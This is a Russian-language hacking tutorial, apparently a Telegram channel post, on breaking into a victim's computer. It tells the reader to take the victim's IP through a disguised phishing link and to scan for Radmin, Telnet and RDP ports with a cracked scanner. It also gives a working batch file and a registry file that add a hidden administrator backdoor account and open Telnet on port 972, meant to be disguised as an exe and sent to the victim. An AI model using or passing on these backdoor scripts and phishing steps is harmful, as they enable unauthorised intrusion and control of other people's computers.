Получаем доступ к чужому компьютеру через e-mail.

Получаем доступ к чужому компьютеру через e-mail.

t.me/it_shniks


Краткая теория:

1.находим жертву.

2. узнаете ip.

3. ищем открытые порты.

4. открываете порты (если открытых не было).

5. устанавливаете связь через порты(telnet - 23 порт, radmin - 4899 или remote Desktop - 3899).

6. план Б.


<УЗНАЁМ IP -шник.>

Узнаём IP ибо без него ничего не получится. Регаемся тут:

http://hpc.name/sniffer

Теперь идем в «настройки», при необходимости загружаем свое изображение.После чего нам дается ссылка на сниффер, с редиректом (перенаправлением) на нашу картинку! Не забудьте поставить галочку на «записывать IP в лог». Смысл в том, чтобы дать эту ссылку своей «жертве», но только со ссылкой cпрятанной в слове.

КМБ по html:

Надо создать текстовый файл с раширением html (или php), поместить в него код(см.ниже) с партнерской ссылкой и закачать его на свой домен.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">

<html>

 

<!-- Yandex.Metrika counter -->

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<link type="image/x-icon" rel="shortcut icon" href="/favicon.ico" />

<title>НАЗВАНИЕ СТРАНИЦЫ</title>

<style>

html, body, iframe {margin:0;padding:0;height:100%;}

iframe {display:block;width:100%;border:none;}

</style>

</head>

<body>

<iframe src="ПАРТНЕРСКАЯ ССЫЛКА"></iframe>

</body>

</html>

Далее пишите какой-нибудь текст (включайте фантазию!!!). Возьмём самое простое: 

Здравствуйте! На Ваш E-mail адрес была отправленна открытка, чтобы посмотреть ее, нажмите сюда.

Это было самое легкое, советую придумать что-то более оригинальное.

Всю эту муть отправляете жертве. При желании можно использовать сервисы анонимной отправки почты, или залить php скрипт, и самому сделать такой сервис. Так же можно использовать уже готовый, гугл вам в помощь.

Теперь, осталось жертве ПЕРЕЙТИ «посмотреть картинку», а нам как IP палится в логе!

Замечу так же что это всего лишь один из способов получения IP на канале в телеграмме Торчике модно найти ещё парочку:

http://telegra.ph/Vychislyaem-IP-po-pochte-08-08

http://telegra.ph/Dobyvaem-IP-i-opredelyaem-mestopolozhenie-08-10


< Проверяем хост на наличие уязвимостей / открытых портов >

Советую использовать несколько сканеров, что не покажет один покажет другой.

Первый сканер будет XSpider 7.5

Скачать можно здесь:

http://programsafe.ucoz.ru/load/xspider_7_5_krjaknutaja_versija/39-1-0-545

Или тут:

https://www.nulled.cc/threads/179115/


Теперь опишу настройку профиля

открываете сканер:

»>Профиль 

»>Новый… 

»>Комментарий (пишите что хотите) 

»>Идете на вкладку «Сканер Портов», и внизу рядом с надписью «default.prt» давите [...] 

»>Выйдет окошко, давите «новый» 

»>Пустой 

»>В комментах пишите что угодно 

»>внизу увидеть «добавить порты» и пишите «4899» и «3389» 

»>Сохранить как «4899». 

»>Дольше выходите обратно на вкладки, и снимаете отовсюду галки. 


Точно также создаём еще один профиль, только порт 23!

ВСЁ )))

< АТАКА>

Теперь вбиваете IP своей жертвы, в поле «добавить хост» и начинаете сканировать. Если вдруг открытым оказался один из портов 4899 — Radmin, 23 — telnet, 3389 — Remote Desktop (удаленный рабочий стол) — пробуете законнектиться (подключиться). Пароль по дефолту 12345678, об этом уже писалось. Самое лучшее (для меня), когда открыт 4899 порт (Radmin). Подключились? Радуемся(0_О !!! Теперь можете делать с чужим компом всё что вздумается, но не забывайте об ответственности.


БЕЗОПАСНОСТЬ кулхацкера заключается в чём? Правильно.Не палиться, поэтому рекомендую Вам убрать иконку в трее (рядом с часиками), и создать нового пользователя, с правами администратора. Вот ссылка:

http://telegra.ph/Sozdayom-uchyotku-i-dayom-ej-prava-06-30

<Настраиваем удаленный доступ>

RAdmin Viewer ,есть в стандартной комплектации Windows. Как с ним работать смотрите в этой ссылке:

http://www.oszone.net/10156

Если не получилось подключиться, не отчаиваемся, читаем план Б.


< ПЛАН Б>

Если анализ ничего не дал? 

Если он ничего не дал, то можно своими усилиями помочь себе. Делается это просто, серверная часть устанавливается на удаленный компьютер/открывается нужный порт с нужным логином и паролем. Конечно, но как установить/открыть, если компьютер далеко??? 

Через интернет тоже можно установить программу на чужой компьютер/или открыть доступ к уже существующему. 

Radmin если что, тоже идет в стандартной комплектации Windows. А установить, что это действительно Windows, можно тем же сканером. Значит — нам остается только открыть доступ к этому сервису (порт 23). Об этом до нас тоже позаботились, и написали вот такой *.txt файл, который в последствии переименовывается в *.bat. 

Затем создается еще один файл, файл конфигурации реестра, который скрывает нового пользователя с глаз, и его не видно в окне приветствия. 

содержимое *.bat файла:


++++ 

chcp 1251 

net user SUPPORT_388945a0 /delete 

net user restot 12345678 /add 

net localgroup Администраторы restot /add 

net localgroup Пользователи SUPPORT_388945a0 /del 

regedit /s conf.reg 

sc config tlntsvr start= auto 

tlntadmn config port=972 sec=-NTLM 

net start Telnet 

++++ 


Этим файлом Вы создаете нового пользователя с именем restot и паролем 12345678.

Импортируете в реестр настройки, которые скроют Ваше имя в окне приветствия. 

Открываете 972 порт, и активируете телнет через него. 

Записывается без плюсиков в блокнот, потом меняется расширение на *.bat 

Теперь содержимое файла conf.reg:


++++ 

Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows 

NTCurrentVersionWinlogonSpecialAccountsUserLis t] 

«restot»=dword:00000000 

++++ 


В последней строке, в кавычках, пишите имя, которое указали в *.bat файле. 

также записываете в блокнот, а потом меняете расширение на *.reg 

Сохраняете все это в одной папке, можно просто заархивировать оба файла в один архив, а можно поступить умнее, скомпилировать файл *.bat в файл *.exe, и также добавить в архив поменяв иконку, го в гугле.После того как жертва запустит батник, можно будет коннектиться к 972 порту, или к любому другому, главное чтобы не был занят... 

Затем можно установить то что нужно через службу Telnet, и более комфортно управлять удаленной машиной. 

Хочешь больше? Больше тут: https://t.me/it_shniks